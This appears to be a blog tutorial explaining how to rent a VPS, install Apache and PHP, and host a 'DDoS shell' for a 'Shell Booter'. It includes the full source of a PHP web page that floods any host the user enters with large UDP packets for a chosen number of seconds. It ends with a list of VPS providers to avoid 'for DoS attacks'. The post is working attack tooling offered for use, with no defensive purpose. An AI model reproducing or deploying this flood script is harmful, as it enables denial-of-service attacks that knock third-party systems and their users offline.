Labels:
Tutorial
In this tutorial you will learn how to shell a VPS so that you can then add it to your Shell Booter, etc.
Step 1
You are going to need to buy a VPS. Once you have done that install this OS centos-6-x86
Step 2
Login to your VPS now via PuTTy.
Type: yum install http
Then type y and hit enter if it prompts you to do so. Now once that is done.
Type: yum install php
Then type y and hit enter if it prompts you to do so.
Step 3
Download WinSCP and then login to it with your VPS. Once their you will be at the root directory.
Step 4
Click the 2 dots at the top
Step 5
Now go to the bottom and click var.
Click image to enlarge
Step 6
Now click www.
Click image to enlarge
Step 7
Now click html.
Click image to enlarge
Step 8
Once you are their now create a new file and call it shell.php when a new box opens copy and paste this.
<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<title>+DDoS Shell</title>
<center>
<body background="http://i701.photobucket.com/albums/ww12/skyw09/matrix-gradient.gif">
<font color="FF3636">
<font size= "6">
<font size="5">
<pre>
</pre>
<b>Your IP:</b> <font color="blue"><?php echo $ip; ?></font> (Don't Hit yourself)<br><br><font color="red">
</font>
<STYLE>
input{
background-color: white; font-size: 10pt; color: black; font-family: Tahoma; border: 1 solid #66;
}
button{
background-color:# FF0303; font-size: 8pt; color: black; font-family: Tahoma; border: 1 solid #66;
}
body {
}
</style>
<?php
//UDP
if(isset($_GET['host'])&&isset($_GET['time'])){
$packets = 0;
ignore_user_abort(TRUE);
set_time_limit(0);
$exec_time = $_GET['time'];
$time = time();
//print "Started: ".time('d-m-y h:i:s')."<br>";
$max_time = $time+$exec_time;
$host = $_GET['host'];
for($i=0;$i<65000;$i++){
$out .= 'X';
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$rand = rand(1,65000);
$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second \n";
echo '<br><br>
<form action="'.$surl.'" method=GET>
<input type="hidden" name="act" value="phptools">
Host: <br><input type=text name=host><br>
Length (seconds): <br><input type=text name=time><br>
<input type=submit value=Go></form>';
}else{ echo '<br><b>UDP Flood</b><br>
<form action=? method=GET>
<input type="hidden" name="act" value="phptools">
Host: <br><input type=text name=host value=><br>
Length (seconds): <br><input type=text name=time value=><br><br>
<input type=submit value=Go></form>';
}
?>
<marquee behavior="scroll" direction="right"><font color="limegreen"><center><strong>Don't over use this shell if you do i will no long release shells</strong></font></marquee>
<marquee behavior="scroll" direction="left"><font color="blue"><center><strong>Welcome To +DDoS Shell</strong></font></marquee</center>
</body>
</html>
Then hit save. A box should appear asking for your password, enter it. You can change that to another shell, but I'm going to use this one.
Step 9
Now open your web-browser and type your VPS's IP + /shell.php on the end.
e.g. 1.1.1.1/shell.php
Where Not To Buy VPS's For DoS Attacks
1. Santrex
2. Whitelabel
3. Rethinkvps
4. 123com (they take forever to send the VPS)
5. nqhost
6. alibabahost
7. hosthatch
Like this post :





0 comments:
Leave a Reply